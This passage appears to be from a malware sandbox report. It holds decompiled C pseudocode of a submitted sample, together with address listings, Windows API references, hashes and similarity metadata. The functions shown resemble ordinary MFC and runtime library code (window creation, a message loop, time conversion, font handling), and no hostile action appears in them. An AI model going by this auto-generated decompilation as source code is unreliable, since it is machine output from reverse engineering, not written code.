							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E00424440(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E0040C619(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E0040763F(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E0042B9DF(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E0040A476( *((intOrPtr*)(_t239 + 8))) != 0 && E0040AE20( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E0040BB07( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E004075F2(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E0042BD4A(_t239 - 0x94, _t218);
				E00401000( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E00412FBB(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}































                                                                              0x00408ad1
                                                                              0x00408ad6
                                                                              0x00408ae1
                                                                              0x00408ae8
                                                                              0x00408aeb
                                                                              0x00408aee
                                                                              0x00408af3
                                                                              0x00408af6
                                                                              0x00408af9
                                                                              0x00408b01
                                                                              0x00408b07
                                                                              0x00408b0e
                                                                              0x00408b18
                                                                              0x00408b20
                                                                              0x00408b28
                                                                              0x00408b2b
                                                                              0x00408b2f
                                                                              0x00408b33
                                                                              0x00408b36
                                                                              0x00408b36
                                                                              0x00408b39
                                                                              0x00408b47
                                                                              0x00408b48
                                                                              0x00408b4c
                                                                              0x00408b5b
                                                                              0x00408b5e
                                                                              0x00408b61
                                                                              0x00408b64
                                                                              0x00408b6e
                                                                              0x00408b71
                                                                              0x00408b74
                                                                              0x00408b76
                                                                              0x00408b78
                                                                              0x00408b7c
                                                                              0x00408b81
                                                                              0x00408b85
                                                                              0x00408b8b
                                                                              0x00408b8d
                                                                              0x00408b8f
                                                                              0x00408b92
                                                                              0x00408b92
                                                                              0x00408b95
                                                                              0x00408b95
                                                                              0x00408b97
                                                                              0x00408b9a
                                                                              0x00408b9f
                                                                              0x00408ba9
                                                                              0x00408bb2
                                                                              0x00408bb5
                                                                              0x00408bb8
                                                                              0x00408bbb
                                                                              0x00408bbe
                                                                              0x00408bcc
                                                                              0x00408bce
                                                                              0x00408bce
                                                                              0x00408bd1
                                                                              0x00408bd6
                                                                              0x00408bd9
                                                                              0x00408bdc
                                                                              0x00408be2
                                                                              0x00408be2
                                                                              0x00408be4
                                                                              0x00408be8
                                                                              0x00408bef
                                                                              0x00408bf5
                                                                              0x00408bf8
                                                                              0x00408bfc
                                                                              0x00408c33
                                                                              0x00408c39
                                                                              0x00408c3c
                                                                              0x00408c3e
                                                                              0x00408c42
                                                                              0x00408c56
                                                                              0x00408c56
                                                                              0x00408c44
                                                                              0x00408c4f
                                                                              0x00408c4f
                                                                              0x00408c58
                                                                              0x00408c5c
                                                                              0x00408bfe
                                                                              0x00408c00
                                                                              0x00408c03
                                                                              0x00408c08
                                                                              0x00408c0f
                                                                              0x00408c12
                                                                              0x00408c1a
                                                                              0x00408c1f
                                                                              0x00408c22
                                                                              0x00408c25
                                                                              0x00408c2c
                                                                              0x00408c2c
                                                                              0x00408c5f
                                                                              0x00408c68
                                                                              0x00408c68
                                                                              0x00408c6b
                                                                              0x00408c6e
                                                                              0x00408c6e
                                                                              0x00408c75
                                                                              0x00408c78
                                                                              0x00408c7f
                                                                              0x00408c80
                                                                              0x00408c81
                                                                              0x00408c8b
                                                                              0x00408c83
                                                                              0x00408c83
                                                                              0x00408c83
                                                                              0x00408c91
                                                                              0x00408c92
                                                                              0x00408c9b
                                                                              0x00408c9c
                                                                              0x00408c9f
                                                                              0x00408cb6
                                                                              0x00408cba
                                                                              0x00408cbd
                                                                              0x00408cbf
                                                                              0x00408cc4
                                                                              0x00408d13
                                                                              0x00408d27
                                                                              0x00408d33
                                                                              0x00408d46
                                                                              0x00408d52
                                                                              0x00408d5f
                                                                              0x00408d6b
                                                                              0x00408d6b
                                                                              0x00408d75
                                                                              0x00408d7a
                                                                              0x00408d7a
                                                                              0x00408d80
                                                                              0x00408d85
                                                                              0x00408d97
                                                                              0x00408d87
                                                                              0x00408d8f
                                                                              0x00408d91
                                                                              0x00408d91
                                                                              0x00408d9f
                                                                              0x00408da3
                                                                              0x00408dae
                                                                              0x00408db7
                                                                              0x00408dca

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00408AD6
                                                                              • MapDialogRect.USER32(?,?), ref: 00408B64
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00408B85
                                                                              • CLSIDFromString.OLE32(?,00000004), ref: 00408C83
                                                                              • CLSIDFromProgID.OLE32(?,00000004), ref: 00408C8B
                                                                              • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 00408D27
                                                                              • SysFreeString.OLEAUT32(?), ref: 00408D7A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                              • String ID:
                                                                              • API String ID: 493809305-0
                                                                              • Opcode ID: 03bf8b8cdc28ec8505d0e252b5335381370a1e502a4a69656ce9b3d10cdefcd4
                                                                              • Instruction ID: a3d8b8c44afa29ed9ebfc78315a3d4da029f906ac5177d10787a3bac61a36b19
                                                                              • Opcode Fuzzy Hash: 03bf8b8cdc28ec8505d0e252b5335381370a1e502a4a69656ce9b3d10cdefcd4
                                                                              • Instruction Fuzzy Hash: 4EA13771900219DFDB14DFA9C984AEEBBB4FF08304F14452EE849A7391D774AD51CBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A32F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E0041A32F(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E00416254(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E00414150(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E00414110(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E00414110(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E00414150(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E00414110(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x457958;
										if(_v12 == 0) {
											_t159 = 0x45798c;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E00414150( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E00414150(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E00414110(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E00414150(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E00412247(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x45a750;
						goto L10;
					}
				}
			}









































                                                                              0x0041a335
                                                                              0x0041a338
                                                                              0x0041a33d
                                                                              0x0041a342
                                                                              0x0041a344
                                                                              0x0041a347
                                                                              0x0041a34a
                                                                              0x0041a34f
                                                                              0x0041a351
                                                                              0x0041a353
                                                                              0x0041a54d
                                                                              0x00000000
                                                                              0x0041a363
                                                                              0x0041a363
                                                                              0x0041a369
                                                                              0x00000000
                                                                              0x0041a379
                                                                              0x0041a37d
                                                                              0x0041a395
                                                                              0x0041a395
                                                                              0x0041a398
                                                                              0x0041a3a8
                                                                              0x0041a3ab
                                                                              0x0041a3b1
                                                                              0x0041a3bb
                                                                              0x0041a3be
                                                                              0x0041a3c1
                                                                              0x0041a3c8
                                                                              0x0041a3c9
                                                                              0x0041a3ce
                                                                              0x0041a3db
                                                                              0x0041a3de
                                                                              0x0041a3e2
                                                                              0x0041a3e5
                                                                              0x0041a3ea
                                                                              0x0041a3ed
                                                                              0x0041a3f4
                                                                              0x0041a3f8
                                                                              0x0041a408
                                                                              0x0041a40a
                                                                              0x0041a40d
                                                                              0x0041a411
                                                                              0x0041a461
                                                                              0x0041a462
                                                                              0x0041a467
                                                                              0x0041a476
                                                                              0x0041a47e
                                                                              0x0041a484
                                                                              0x0041a488
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a488
                                                                              0x0041a46e
                                                                              0x0041a46f
                                                                              0x0041a470
                                                                              0x0041a474
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a419
                                                                              0x0041a419
                                                                              0x0041a41c
                                                                              0x0041a41f
                                                                              0x0041a425
                                                                              0x0041a42b
                                                                              0x0041a42c
                                                                              0x0041a431
                                                                              0x0041a440
                                                                              0x0041a448
                                                                              0x0041a44e
                                                                              0x0041a452
                                                                              0x0041a491
                                                                              0x0041a49a
                                                                              0x0041a4a5
                                                                              0x0041a4a8
                                                                              0x0041a4b5
                                                                              0x0041a4b7
                                                                              0x0041a4be
                                                                              0x0041a4c3
                                                                              0x0041a4c5
                                                                              0x0041a4c5
                                                                              0x0041a4ca
                                                                              0x0041a4cf
                                                                              0x0041a4d3
                                                                              0x0041a4e2
                                                                              0x0041a4e2
                                                                              0x0041a4e3
                                                                              0x0041a4eb
                                                                              0x0041a4f7
                                                                              0x0041a501
                                                                              0x0041a502
                                                                              0x0041a511
                                                                              0x0041a51b
                                                                              0x0041a51e
                                                                              0x0041a52c
                                                                              0x0041a52e
                                                                              0x0041a537
                                                                              0x0041a53c
                                                                              0x0041a544
                                                                              0x0041a546
                                                                              0x00000000
                                                                              0x0041a4d5
                                                                              0x0041a4d5
                                                                              0x0041a4d7
                                                                              0x0041a4d7
                                                                              0x0041a4d8
                                                                              0x0041a4dd
                                                                              0x00000000
                                                                              0x0041a4dd
                                                                              0x0041a4d3
                                                                              0x0041a454
                                                                              0x0041a454
                                                                              0x0041a456
                                                                              0x0041a48a
                                                                              0x0041a48a
                                                                              0x00000000
                                                                              0x0041a48a
                                                                              0x0041a438
                                                                              0x0041a439
                                                                              0x0041a43a
                                                                              0x0041a43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a43e
                                                                              0x0041a411
                                                                              0x0041a381
                                                                              0x0041a389
                                                                              0x0041a38c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a38e
                                                                              0x00000000
                                                                              0x0041a38e
                                                                              0x0041a369

                                                                              APIs
                                                                                • Part of subcall function 00416254: GetLastError.KERNEL32(?,00000000,004141FF,004148BA,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010,004164BE), ref: 00416256
                                                                                • Part of subcall function 00416254: FlsGetValue.KERNEL32(?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00416264
                                                                                • Part of subcall function 00416254: FlsSetValue.KERNEL32(00000000,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 0041628B
                                                                                • Part of subcall function 00416254: GetCurrentThreadId.KERNEL32 ref: 004162A3
                                                                                • Part of subcall function 00416254: SetLastError.KERNEL32(00000000,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 004162BA
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A3A1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A49E
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A4F7
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A514
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A537
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                              • String ID: XyE
                                                                              • API String ID: 223281555-1705365946
                                                                              • Opcode ID: 9b866a42f09a7327600a0d54408eed70851fcbfd2860b31ced82f13353b9270e
                                                                              • Instruction ID: 27c438e82812b57df1231637a248915d31752a43d1760983d55ffa738ffd830e
                                                                              • Opcode Fuzzy Hash: 9b866a42f09a7327600a0d54408eed70851fcbfd2860b31ced82f13353b9270e
                                                                              • Instruction Fuzzy Hash: 22613AB2A01315AFDB10DF99CC45BEEB7F6EB84314F20452FF5109B282D7B899908B19
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00425EAA, Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 97%
                                                                              			E00425EAA(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E00428375(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E004239CE();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E00423CD2();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E00428423(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E00423C3E(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E00430228();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E00428423(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}













                                                                              0x00425eb3
                                                                              0x00425ebb
                                                                              0x00425ebd
                                                                              0x00425ec1
                                                                              0x00425ec5
                                                                              0x00425ed3
                                                                              0x00425ed3
                                                                              0x00425ed8
                                                                              0x00425ede
                                                                              0x00425ee2
                                                                              0x00425ef1
                                                                              0x00000000
                                                                              0x00425f69
                                                                              0x00000000
                                                                              0x00425f69
                                                                              0x00425f07
                                                                              0x00425f6f
                                                                              0x00425f6f
                                                                              0x00425f6f
                                                                              0x00425f76
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00425f7a
                                                                              0x00425f80
                                                                              0x00425f88
                                                                              0x00425f95
                                                                              0x00425f9d
                                                                              0x00425f9f
                                                                              0x00425f9f
                                                                              0x00425f88
                                                                              0x00425fad
                                                                              0x00425fe8
                                                                              0x00000000
                                                                              0x00425faf
                                                                              0x00425fbb
                                                                              0x00425fbd
                                                                              0x00425fc5
                                                                              0x00425fc5
                                                                              0x00425fd9
                                                                              0x00000000
                                                                              0x00425fdb
                                                                              0x00000000
                                                                              0x00425fdb
                                                                              0x00425fd9
                                                                              0x00425fad
                                                                              0x00425fdd
                                                                              0x00425fde
                                                                              0x00000000
                                                                              0x00425fe3
                                                                              0x00425f0b
                                                                              0x00425f11
                                                                              0x00425f19
                                                                              0x00425f1b
                                                                              0x00425f1b
                                                                              0x00425f22
                                                                              0x00425f3d
                                                                              0x00425f3d
                                                                              0x00425f48
                                                                              0x00425f65
                                                                              0x00425f65
                                                                              0x00000000
                                                                              0x00425f4a
                                                                              0x00425f57
                                                                              0x00425f5d
                                                                              0x00425f63
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00425f63
                                                                              0x00425f48
                                                                              0x00000000
                                                                              0x00425f69

                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00425ED8
                                                                              • PeekMessageA.USER32 ref: 00425EFF
                                                                              • UpdateWindow.USER32(?), ref: 00425F19
                                                                              • SendMessageA.USER32(?,00000121,00000000,?), ref: 00425F3D
                                                                              • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 00425F57
                                                                              • UpdateWindow.USER32(?), ref: 00425F9D
                                                                              • PeekMessageA.USER32 ref: 00425FD1
                                                                                • Part of subcall function 00428375: GetWindowLongA.USER32 ref: 00428380
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                              • String ID:
                                                                              • API String ID: 2853195852-0
                                                                              • Opcode ID: 248d8cbeb3e497a3571f826ab21379d0acc7778130612cdd31a67b0a7a11fd55
                                                                              • Instruction ID: 62f58de11374fd1399b8c231da8365a07df3de89b82652908c1bdddcf5ef21d3
                                                                              • Opcode Fuzzy Hash: 248d8cbeb3e497a3571f826ab21379d0acc7778130612cdd31a67b0a7a11fd55
                                                                              • Instruction Fuzzy Hash: 7041E130308B519BD721DF22EE44A2BBAF4EFC4B15F95092EF481921A0DB79C945CB1A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040A7D8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114comstringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E0040A7D8(void* __ecx) {
				intOrPtr _t54;
				intOrPtr _t56;
				signed int _t72;
				signed int _t74;
				void* _t79;
				void* _t81;
				void* _t85;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t106;
				intOrPtr* _t107;
				void* _t109;
				void* _t111;
				void* _t112;

				E004128A0(E00431063, _t109);
				_t112 = _t111 - 0x80;
				_t54 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
				_t101 = __ecx;
				 *((intOrPtr*)(_t109 - 0x58)) =  *0x4560dc(_t100, _t103, _t85);
				 *((intOrPtr*)(_t109 - 0x50)) = 0;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x44ab68;
				_t56 =  *((intOrPtr*)(_t109 + 8));
				 *(_t109 - 4) = 0;
				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
					if(E0040A443(_t109 - 0x54, 0x11) != 0 || E0040A443(_t109 - 0x54, 0xd) != 0) {
						_t56 = _t109 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t101 + 0x60)) = 0;
					}
				} else {
					L6:
					_t13 = _t56 + 4; // 0x40ade8
					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x78)) = 0x20;
					_t105 = lstrlenA(_t109 - 0x30) + 1;
					E00412260(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x74)) = E00408F24(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
					_t72 =  *(_t109 - 0x4c);
					_t106 = _t72;
					if(_t72 < 0) {
						_t106 =  ~_t72;
					}
					E0042A852(_t109 - 0x8c);
					 *(_t109 - 4) = 1;
					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
					asm("cdq");
					_t107 = _t101 + 0x60;
					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
					E0042E9AB(_t107);
					_t79 = _t109 - 0x78;
					__imp__#420(_t79, 0x44defc, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
					if(_t79 < 0) {
						 *_t107 = 0;
					}
					 *(_t109 - 4) = 0;
					E0042A8AD(_t109 - 0x8c);
				}
				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x44a720;
				_t81 = E0042AA72(_t109 - 0x54);
